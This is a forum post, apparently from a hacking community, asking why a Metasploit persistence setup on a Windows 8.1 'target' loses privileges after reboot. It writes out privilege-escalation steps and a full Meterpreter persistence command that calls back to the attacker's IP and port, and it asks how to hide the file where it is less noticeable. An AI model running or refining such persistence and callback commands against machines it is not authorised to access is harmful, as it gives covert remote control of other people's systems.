Questions About Privileges and Persistence
Hello again Null Byte,
I'd like to thank some members again for helping me out with a previous brick wall I was running into, it's working much better now thanks.
Just a few questions I haven't been able to get answered after repeated testing and googling.
1.) The persistence .vbs script is getting blocked on startup with an "Access is Denied" error after getting full privileges, target is using Windows 8.1 x64. Common occurance? The answer might be connected to question nr. 2...
2.) Is it normal to lose privileged access after reboot?
On my target machine I use the exploit/local/windows/ask, then getprivs, then getsystem and it works on the first try. Bam! I'm In! Now I setup the persistence script, reboot. And when it restarts, .vbs access is denied so persistence doesn't run and when I manually run the payload again I have lost all privileges.
3.) This is the persistence command line I use
"run persistence -A -L c:\\Windows -S -U -X -i 15 -p <MyPort> -r <MyIP>"
I place it in Windows to make it less noticeable because it kinda sticks out when I place it in C:\\, so perhaps the placement is the problem.
So the question becomes, how do I place it in another location? When I try C:\\Users, \Program Files or \Program Files (x86) it just gives me errors saying the locationes aren't found.
I hope it's OK asking all these questions, I feel this community rewards self-learning so maybe a path in the right direction would be better than a straight up answer.
Thanks in advance,